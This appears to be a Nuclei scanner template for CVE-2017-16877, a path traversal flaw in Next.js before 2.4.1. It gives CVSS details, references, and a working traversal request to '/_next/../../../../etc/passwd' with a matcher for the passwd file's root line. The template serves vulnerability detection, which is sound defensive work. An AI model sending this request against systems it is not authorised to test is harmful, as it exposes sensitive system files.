id: CVE-2017-16877 info: name: Nextjs <2.4.1 - Local File Inclusion author: pikpikcu severity: high description: ZEIT Next.js before 2.4.1 is susceptible to local file inclusion via the /_next and /static request namespace, allowing attackers to obtain sensitive information. reference: - https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 - https://github.com/zeit/next.js/releases/tag/2.4.1 - https://nvd.nist.gov/vuln/detail/CVE-2017-16877 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-16877 cwe-id: CWE-22 epss-score: 0.0032 cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* epss-percentile: 0.66762 metadata: max-request: 1 vendor: zeit product: next.js tags: cve,cve2017,nextjs,lfi,traversal http: - method: GET path: - "{{BaseURL}}/_next/../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" condition: and - type: status status: - 200